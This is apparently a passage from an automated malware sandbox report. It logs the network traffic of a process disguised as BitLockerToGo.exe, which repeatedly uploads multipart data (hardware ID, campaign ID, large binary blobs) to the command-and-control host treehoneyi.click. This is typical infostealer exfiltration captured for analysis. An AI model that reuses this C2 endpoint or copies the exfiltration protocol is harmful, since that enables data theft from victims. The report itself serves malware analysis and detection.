                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1676&rtt_var=647&sent=9&recv=22&lost=0&retrans=0&sent_bytes=2841&recv_bytes=19076&delivery_rate=1668571&cwnd=152&unsent_bytes=0&cid=171f731c888d22ac&ts=1030&x=0"
                                                                                                                    2024-12-26 11:01:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                    2024-12-26 11:01:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.449739172.67.180.1134437676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-26 11:01:32 UTC280OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: multipart/form-data; boundary=NZKI1E0ZV4QP4CG2X
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 8778
                                                                                                                    Host: treehoneyi.click
                                                                                                                    2024-12-26 11:01:32 UTC8778OUTData Raw: 2d 2d 4e 5a 4b 49 31 45 30 5a 56 34 51 50 34 43 47 32 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 37 30 43 34 34 41 35 44 31 41 42 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4e 5a 4b 49 31 45 30 5a 56 34 51 50 34 43 47 32 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 5a 4b 49 31 45 30 5a 56 34 51 50 34 43 47 32 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 72 41 47 78 53 46 2d 2d 73 68 65 65 76 0d 0a 2d
                                                                                                                    Data Ascii: --NZKI1E0ZV4QP4CG2XContent-Disposition: form-data; name="hwid"C170C44A5D1ABD98AC8923850305D13E--NZKI1E0ZV4QP4CG2XContent-Disposition: form-data; name="pid"2--NZKI1E0ZV4QP4CG2XContent-Disposition: form-data; name="lid"rAGxSF--sheev-
                                                                                                                    2024-12-26 11:01:33 UTC1125INHTTP/1.1 200 OK
                                                                                                                    Date: Thu, 26 Dec 2024 11:01:33 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=ejikdraqvih6k1l1k64ciqah0f; expires=Mon, 21 Apr 2025 04:48:12 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Frame-Options: DENY
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mQnIXWqdHrczHOx7rfHMKAGew813K6ZlYqRDIBMEQG1ePl66UjPbx2kdemOTlPRDAiL1T8ZUIG%2FDRaD8x75OV1V5dERP6%2B3m%2BcT25HS5DJ85GDUMgkk4rvKDWwdH5%2BSqC9D1"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f8092d0ccb8422b-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1588&rtt_var=598&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9716&delivery_rate=1838790&cwnd=220&unsent_bytes=0&cid=f150aa23cd81a8e9&ts=813&x=0"
                                                                                                                    2024-12-26 11:01:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                    2024-12-26 11:01:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.449740172.67.180.1134437676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-26 11:01:35 UTC278OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: multipart/form-data; boundary=5WUKJX71OLLRGG
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 20413
                                                                                                                    Host: treehoneyi.click
                                                                                                                    2024-12-26 11:01:35 UTC15331OUTData Raw: 2d 2d 35 57 55 4b 4a 58 37 31 4f 4c 4c 52 47 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 37 30 43 34 34 41 35 44 31 41 42 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 57 55 4b 4a 58 37 31 4f 4c 4c 52 47 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 57 55 4b 4a 58 37 31 4f 4c 4c 52 47 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 72 41 47 78 53 46 2d 2d 73 68 65 65 76 0d 0a 2d 2d 35 57 55 4b 4a 58 37 31
                                                                                                                    Data Ascii: --5WUKJX71OLLRGGContent-Disposition: form-data; name="hwid"C170C44A5D1ABD98AC8923850305D13E--5WUKJX71OLLRGGContent-Disposition: form-data; name="pid"3--5WUKJX71OLLRGGContent-Disposition: form-data; name="lid"rAGxSF--sheev--5WUKJX71
                                                                                                                    2024-12-26 11:01:35 UTC5082OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                    2024-12-26 11:01:36 UTC1125INHTTP/1.1 200 OK
                                                                                                                    Date: Thu, 26 Dec 2024 11:01:36 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=dv5pqjosnu5cgqvv7mhu17musu; expires=Mon, 21 Apr 2025 04:48:15 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Frame-Options: DENY
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=faerNI4YKpLpqlfjlzTihsenbjD6ADgANf%2BOJ3QQrlWlxzaZxQnHwtqtVO8kkJ45AwyqSlRGHx%2BnrrgnkjgU7IDH01gZ4NwL6bnAv166uquD2ZNnORoxUnxWT%2BseAr11s8vL"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f8092e19a5242e0-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1617&rtt_var=621&sent=16&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21371&delivery_rate=1740166&cwnd=252&unsent_bytes=0&cid=0c9d69f819a029f9&ts=988&x=0"
                                                                                                                    2024-12-26 11:01:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                    2024-12-26 11:01:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.449741172.67.180.1134437676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-26 11:01:37 UTC276OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: multipart/form-data; boundary=UYZYJ2CR9XWAI
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 1244
                                                                                                                    Host: treehoneyi.click
                                                                                                                    2024-12-26 11:01:37 UTC1244OUTData Raw: 2d 2d 55 59 5a 59 4a 32 43 52 39 58 57 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 37 30 43 34 34 41 35 44 31 41 42 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 59 5a 59 4a 32 43 52 39 58 57 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 59 5a 59 4a 32 43 52 39 58 57 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 72 41 47 78 53 46 2d 2d 73 68 65 65 76 0d 0a 2d 2d 55 59 5a 59 4a 32 43 52 39 58 57
                                                                                                                    Data Ascii: --UYZYJ2CR9XWAIContent-Disposition: form-data; name="hwid"C170C44A5D1ABD98AC8923850305D13E--UYZYJ2CR9XWAIContent-Disposition: form-data; name="pid"1--UYZYJ2CR9XWAIContent-Disposition: form-data; name="lid"rAGxSF--sheev--UYZYJ2CR9XW
                                                                                                                    2024-12-26 11:01:38 UTC1138INHTTP/1.1 200 OK
                                                                                                                    Date: Thu, 26 Dec 2024 11:01:38 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=4d64ta7ou3j3148lemi21b6439; expires=Mon, 21 Apr 2025 04:48:17 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Frame-Options: DENY
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wda%2F%2Ff1vbD%2FguDntWo9s%2F%2BqDzGDAaBwXOKct5z0q9jk%2B0r%2BydihK%2BbwTZK3gVGFsN3FUwTdmX%2BWzYCSHBNZTPRYdXYDtGxRQobdVbhU77BSwwVECXn94S5N%2FsN%2BFnx8TmOUQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f8092f1af837c96-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1977&rtt_var=755&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2156&delivery_rate=1436301&cwnd=173&unsent_bytes=0&cid=0826e0cf2385b53d&ts=845&x=0"
                                                                                                                    2024-12-26 11:01:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                    2024-12-26 11:01:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.449742172.67.180.1134437676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-26 11:01:40 UTC281OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: multipart/form-data; boundary=5CCKHBLPQDP6JKKB
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 573418
                                                                                                                    Host: treehoneyi.click
                                                                                                                    2024-12-26 11:01:40 UTC15331OUTData Raw: 2d 2d 35 43 43 4b 48 42 4c 50 51 44 50 36 4a 4b 4b 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 37 30 43 34 34 41 35 44 31 41 42 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 43 43 4b 48 42 4c 50 51 44 50 36 4a 4b 4b 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 43 43 4b 48 42 4c 50 51 44 50 36 4a 4b 4b 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 72 41 47 78 53 46 2d 2d 73 68 65 65 76 0d 0a 2d 2d 35 43
                                                                                                                    Data Ascii: --5CCKHBLPQDP6JKKBContent-Disposition: form-data; name="hwid"C170C44A5D1ABD98AC8923850305D13E--5CCKHBLPQDP6JKKBContent-Disposition: form-data; name="pid"1--5CCKHBLPQDP6JKKBContent-Disposition: form-data; name="lid"rAGxSF--sheev--5C
                                                                                                                    2024-12-26 11:01:40 UTC15331OUTData Raw: 25 6b e6 7e 14 00 da c4 af 83 da e5 c5 73 37 72 7d 27 6c 54 83 a7 5f 07 12 80 75 3f d3 bb 70 b9 4e 85 cd bc 7e 95 ca c8 0a dd ef 0f a1 c0 f3 f3 14 aa d8 79 ca 4e c0 ff 0b 0f 4b a3 23 f6 24 42 c9 fa c0 30 5b 16 28 cd cb 73 dc c5 57 c3 2d 7b 72 e6 0b 8f 80 e0 d6 77 ee 62 60 75 21 c2 c1 41 9e 8e df 4a f9 ff 57 18 1a 7e 05 d8 1d e6 68 96 32 32 e1 a1 77 83 68 d8 53 19 6c 83 43 62 c2 71 c4 11 b5 5a 77 e6 d8 36 cc ea a1 6a 61 b0 04 c4 63 ce 9f b3 b0 c2 82 8f 74 c4 5a 5c 74 8d 08 7a a5 08 54 ae 37 8f 62 c5 29 47 13 82 86 71 0c 16 40 1d e1 77 37 c2 5f 7f ca fb e3 0c 76 f1 60 13 7b 4f 76 c8 02 5e 25 82 47 fd e7 43 66 f1 6a 76 9b 21 6a 59 c9 97 1d 80 be ec 82 48 d6 8c b5 9c ee 5e e9 96 e3 52 65 c2 80 15 f2 50 62 60 bf 64 a8 d9 bc 55 e7 75 be b9 24 2e b1 2f 34 04 44
                                                                                                                    Data Ascii: %k~s7r}'lT_u?pN~yNK#$B0[(sW-{rwb`u!AJW~h22whSlCbqZw6jactZ\tzT7b)Gq@w7_v`{Ov^%GCfjv!jYH^RePb`dUu$./4D
                                                                                                                    2024-12-26 11:01:40 UTC15331OUTData Raw: fe b3 47 d7 d4 e6 fa 23 9b d9 44 10 92 e8 b9 f5 96 b4 e3 fb 9f 5e 19 4c 10 76 5a ba 0e 47 2f e8 80 2e aa 53 34 6a 3d d4 b2 5a 78 a2 af 6a e2 37 66 1f 19 a3 75 c9 8c 4a 66 13 46 68 46 00 ce 4b b5 9f 93 9d 54 ca ec a5 cf aa 86 df 7e 92 6c cd e5 ac a3 11 2a 33 dd 36 86 fa 2c 92 9b 44 3b 03 a4 67 43 e3 9b fe 91 34 16 3a cd d7 3a c3 ba ba 4a 87 e3 d4 46 6b 12 c0 62 3a 9d 34 a2 34 9c 69 7d 43 f9 20 bc 66 1e 65 9d 48 f2 c7 51 30 f3 fb 2f 75 3f 33 9a 89 de dd 6e 0d 87 b4 9a c5 2f 7f c6 c6 fb 07 f2 fc 06 c9 ae cc 5e d9 c3 4e 17 95 c3 03 b7 51 66 87 1f c4 52 7a c5 5c fc 45 f7 bc dc cd cb f2 b7 1b 17 0e 9b 3f b3 b7 8b 74 17 23 ec 5a cd 56 10 1e 31 c8 bc 6b 22 00 8b 13 83 c5 c5 bc ce 6f 39 12 16 03 57 bd 80 34 ea b3 7e ee 0f 32 96 92 76 90 59 b2 9c aa 27 70 9a 7f fc
                                                                                                                    Data Ascii: G#D^LvZG/.S4j=Zxj7fuJfFhFKT~l*36,D;gC4::JFkb:44i}C feHQ0/u?3n/^NQfRz\E?t#ZV1k"o9W4~2vY'p
                                                                                                                    2024-12-26 11:01:40 UTC15331OUTData Raw: 97 47 24 cf a1 89 af a4 28 3e 1b 6e 93 0a 09 51 64 9d fd d8 3d e0 fc 7e 62 12 20 c4 6f 35 00 1c d5 f5 db 57 c3 03 f5 64 99 e3 e1 fe f2 c4 03 5c df 9d c2 d2 20 0c 0d cd 90 f0 45 1d 02 e7 69 d9 3d 06 e8 39 1b 6b 8b 25 89 01 99 c8 70 71 e6 37 9c cb b3 f1 33 74 66 5f 99 0f 3f 6e 45 ca 2c 4e 4a 58 be e9 87 a9 28 e2 13 3f 4a 1d 6b de ba 50 74 64 e4 28 b0 d0 b1 00 39 1a 28 4d b3 3c 9a d0 39 4c 8a a7 66 36 e0 f8 95 28 28 55 49 6f ed 05 9f 35 10 aa e0 f5 8e 5a 68 db a0 13 8a 3c 3d 57 eb 27 98 15 bf 3e d6 a4 4b 41 f9 fb 2c ec 4d fd c9 fb de d3 a8 12 2b 51 62 6d 4d 07 dc d4 64 c8 2c 1e b9 2a 3f 2c e6 cb ec 1b c3 72 05 a0 6e 95 71 7f 76 97 d5 d1 a2 9f a1 a3 0f 5d de 03 26 d2 f0 32 5c 17 e9 2f d2 cd af c9 85 4b 77 c4 43 84 d6 a9 a2 4d 9e 2d 3b de 97 f9 86 46 b9 f1 5f
                                                                                                                    Data Ascii: G$(>nQd=~b o5Wd\ Ei=9k%pq73tf_?nE,NJX(?JkPtd(9(M<9Lf6((UIo5Zh<=W'>KA,M+QbmMd,*?,rnqv]&2\/KwCM-;F_
                                                                                                                    2024-12-26 11:01:40 UTC15331OUTData Raw: 78 0c 63 6a 1b c9 30 15 4d 21 62 db 13 0f 1b c3 e4 cb 54 07 09 2d 84 d1 0d 73 e5 ea 91 6b af 8a 12 7f b9 00 23 13 a3 86 48 cd 6d 0f 12 42 64 f7 39 5e a6 e8 e7 5f 2c 52 b8 a3 30 0c 57 22 d2 46 49 50 96 1e 07 03 74 2d 93 36 c5 c1 7b f7 c2 eb a7 09 2e 18 ee 7b cf 43 a5 56 bb b6 c8 69 52 f0 5b 8c 55 a7 af fc da 32 df 9f a5 b7 69 f2 d1 95 2b 46 11 d3 58 c4 14 1c 51 be eb 5a 9b c1 15 56 f2 22 e5 d3 2f 62 d8 08 d2 cc 06 f1 b2 f0 4c 7a 38 2f 27 f0 5e 5b d9 ee 8d 87 cf 28 ad eb 9b e6 35 b7 88 ff 73 2e f6 82 3d 94 1f 1d ff a1 29 aa ec 61 24 04 2e 30 e8 b3 1b f7 66 93 70 49 ea 49 04 9f b9 d6 c7 2e b1 82 4a 66 a7 36 b3 1e 8a a9 19 a5 31 05 19 6d ff 62 7d 04 69 03 19 c7 cb 32 65 b8 03 e0 c8 fc bf fd 14 ff bf 87 5e d7 bf db 70 9a 29 34 75 c4 a0 0c b0 eb 44 0c be af 2c
                                                                                                                    Data Ascii: xcj0M!bT-sk#HmBd9^_,R0W"FIPt-6{.{CViR[U2i+FXQZV"/bLz8/'^[(5s.=)a$.0fpII.Jf61mb}i2e^p)4uD,
                                                                                                                    2024-12-26 11:01:40 UTC15331OUTData Raw: ed 13 3b c4 b8 36 91 96 41 da d0 fd 21 bf b3 34 c1 9d 8b 9f 62 c2 57 58 1d 9b 99 de 50 27 6f 96 37 28 5a ac 35 85 7d 55 34 f4 d4 2c 45 05 a3 37 3f 8f 24 ec 93 8d 08 2c e6 89 70 2e 12 e8 11 8d ee d9 c8 0b 2e 26 aa 6a 2c 20 5a 57 31 79 38 73 c6 73 33 7d 15 6d 15 3b 7b a8 8e fb 07 e8 a8 11 c0 c6 cb 35 66 b5 90 2e f3 a1 7a 70 0d a9 a6 a1 3b cc aa 0d 99 25 87 3a 18 87 02 77 38 88 e3 2c 83 2d e7 04 5e 88 58 e8 fb 24 3c b4 bd 4b fc de 9c cd 4b 08 8e c9 bd 3d bc 7a dc 67 a3 ad 92 48 af e5 29 b3 eb 77 38 35 81 3f 77 0c f8 2b e3 98 d2 8f e6 ef dd 73 20 6c fd e1 74 0e 5d f9 3d 74 63 c3 19 d0 8f 75 db 69 c5 83 fc ee c5 b8 69 4e d0 f1 22 7a 88 b7 07 86 cf 81 40 10 74 64 32 5b 45 57 a6 53 2c d5 93 ce 2f cf 53 67 d0 f5 69 01 26 1a d1 cb 3b e4 14 3f 48 fa a2 91 5e 75 f1
                                                                                                                    Data Ascii: ;6A!4bWXP'o7(Z5}U4,E7?$,p..&j, ZW1y8ss3}m;{5f.zp;%:w8,-^X$<KK=zgH)w85?w+s lt]=tcuiiN"z@td2[EWS,/Sgi&;?H^u
                                                                                                                    2024-12-26 11:01:40 UTC15331OUTData Raw: 31 36 56 fc 2f 39 a6 d6 87 af e5 78 28 3e 86 88 df 49 16 5b d0 a7 9d 04 63 ee c5 98 8d d6 2a 85 dd f1 3f 34 19 f2 cf 8c d6 db 0f 86 56 a7 64 cd d8 f3 0a 5f b4 a6 da d2 4d e6 07 86 59 3f 86 cf 68 33 b7 e7 49 5b ce e7 ff a8 22 85 02 39 eb 6e 43 bb f1 33 14 ed 9b 59 d9 3f 68 d8 93 a9 c3 18 e6 95 40 a4 e0 72 27 1f 28 46 bd 57 06 41 cc 07 07 32 ba 35 dd 1f df 9d 1b 52 8f 04 74 fe cb 1c b0 cd 31 fa cd 03 77 c0 e2 ab e1 dd 69 39 ba 6b 20 cd d4 59 05 bc b9 c7 8d 92 f2 66 12 48 86 89 15 b6 72 a7 92 3e 48 60 ea c9 5e eb 02 79 d3 ee 36 17 c7 7f bb cc b7 1f 9f 37 0c 4e 11 43 57 6e 36 64 f4 85 09 9d 0f 76 e4 d9 11 ad 18 7a d3 6e bd e6 5f 25 9a 2a f5 c2 af 43 e4 41 cc 40 71 eb 7b c3 40 8f fd eb 7a bb 23 a1 29 99 20 3f e4 c7 b9 cc bf c9 2e 17 8c 98 5f 78 7d 79 41 5e df
                                                                                                                    Data Ascii: 16V/9x(>I[c*?4Vd_MY?h3I["9nC3Y?h@r'(FWA25Rt1wi9k YfHr>H`^y67NCWn6dvzn_%*CA@q{@z#) ?._x}yA^
                                                                                                                    2024-12-26 11:01:40 UTC15331OUTData Raw: 6a af 7f 3f f9 e1 f7 23 81 ba 6d fa c9 7a b5 84 68 46 f6 ec f2 88 79 f3 35 fc c3 d1 9d 97 ff 49 6c 67 33 aa 28 da bb a6 5e f1 1f 4a 5d b0 b0 5b 32 af 83 04 73 6d af bc 80 cb 87 ef 82 4e f4 28 0a a5 41 ec 40 67 23 fc 6e 65 5c 21 e9 6c 1e 4d b6 82 af 40 a9 2e 10 9d b2 17 1c 5d 90 9c 13 03 e2 57 d1 29 22 9a be bb 40 06 85 32 dc 81 19 e2 da 77 df f4 e0 04 64 84 32 a3 8f 1f 78 23 21 bb 1e bf 70 18 e5 7d 80 43 50 b1 28 62 e8 07 48 bb 24 d0 1f 43 bd 8d a0 5c 39 4d 3b 77 dc b4 d6 17 e0 dc ff f4 60 38 8b d0 43 72 13 b6 a0 95 75 d9 f1 68 e2 79 96 83 5c d4 8f a9 be e3 af 41 6e 0b 59 b9 b1 5e 79 bf b1 d4 33 9c a6 98 60 05 56 b3 0b 71 98 d6 2d 1e ab 09 33 ba 31 fe cf 58 d6 29 02 ec a3 a3 f8 df 70 02 a8 56 ec 80 3f b3 4b 3d 86 d3 07 7b 10 f6 89 92 57 a1 69 24 0e 44 3f
                                                                                                                    Data Ascii: j?#mzhFy5Ilg3(^J][2smN(A@g#ne\!lM@.]W)"@2wd2x#!p}CP(bH$C\9M;w`8Cruhy\AnY^y3`Vq-31X)pV?K={Wi$D?
                                                                                                                    2024-12-26 11:01:40 UTC15331OUTData Raw: c1 ce dc 37 6b 7c 71 06 a3 94 2d e8 08 28 f2 af 4e 1a d3 f2 5e dc 72 8d 0f 47 c4 f0 01 65 b3 a6 7b 3b f2 07 9a c3 17 8d 08 25 bb b6 85 05 5a 74 38 c6 8e eb 6e ee 75 37 5f 2f d6 63 4b 4e 73 77 7c 07 1e c0 bb 73 c0 65 22 31 f2 87 4e 61 39 3b d4 be 55 e1 ae 79 15 4f 5b 6b 9b 06 84 1b a6 a8 a2 21 81 a3 7b d2 81 ad a2 8b ca e3 a2 14 63 2e 1c 59 bd ae 9a b1 fc 7c 22 35 37 6d 59 03 9e 98 1f 02 2a ee 22 43 aa c9 6f 3b 27 07 7f 02 5a 28 bc f9 bf cd 72 b1 16 71 d9 92 87 f2 fe d8 b5 b3 a5 e7 47 f3 b6 41 99 04 d0 bb ba 48 cd b7 4d 82 f6 bf 7f 93 3b e7 d4 21 30 64 6f 0b 62 f9 77 38 2d ae e5 fa 1d 18 59 47 56 9d 8c d3 ef e8 cc 1b 8b 09 be b3 35 c5 ce 92 ea a6 47 13 b5 0c 35 3b 64 e3 d6 34 3b 30 4e 39 bf 3e 07 3d ba 4a 55 ab 3a 62 f8 aa c4 f1 9f 1f 53 45 b1 2d 32 e0 c7
                                                                                                                    Data Ascii: 7k|q-(N^rGe{;%Zt8nu7_/cKNsw|se"1Na9;UyO[k!{c.Y|"57mY*"Co;'Z(rqGAHM;!0dobw8-YGV5G5;d4;0N9>=JU:bSE-2
